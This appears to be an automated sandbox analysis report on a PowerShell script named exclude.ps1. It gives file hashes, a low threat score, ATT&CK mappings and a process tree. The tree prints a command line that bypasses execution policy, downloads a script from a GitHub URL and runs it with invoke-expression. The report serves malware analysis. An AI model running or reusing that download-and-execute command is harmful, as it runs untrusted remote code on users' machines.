9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
16-01-2025 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

i965652f-main/exclude.ps1
Size

979B
MD5

22b7c77e64476f1842845f1529369794
SHA1

b034134dfe982c73793a897278301d05a87a31a4
SHA256

cdcfc9b6d8e0a133e249819859bd5d4aa303dd128ac326ce50d32dcfa884bc56
SHA512

dd32593c528705522f6380ea4751c7c86a18d3a901094ef71babbf12f3ab5aee538052c033d7ca19d622af1b230e1a5fea627608e280b8913d8e63c85f69d752

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2764	powershell.exe
2940	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2940	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2764 wrote to memory of 2940	2764	powershell.exe	31
PID 2764 wrote to memory of 2940	2764	powershell.exe	31
PID 2764 wrote to memory of 2940	2764	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
587e2fdf4764be7b0ecb26f3c60f5cf8

SHA1
2732246e0cf8a554e8f4c216dc80a290da53ce29

SHA256
659158615759de29b0646b86faa08bce17655656ad7c4f24c76c6fcf8e510101

SHA512
08b6820a7437d474ec47653d4d93aa278bcee76bd0b3517cf6924372500da44b42af2b751b49c210aff09f60154113a6933714779b85b9798c2accdc33457efb

Download Submit
memory/2764-4-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

Filesize
4KB

Download
memory/2764-5-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2764-7-0x0000000002730000-0x0000000002738000-memory.dmp

Filesize
32KB

Download
memory/2764-8-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-6-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-9-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-10-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-11-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-14-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2940-18-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2940-19-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download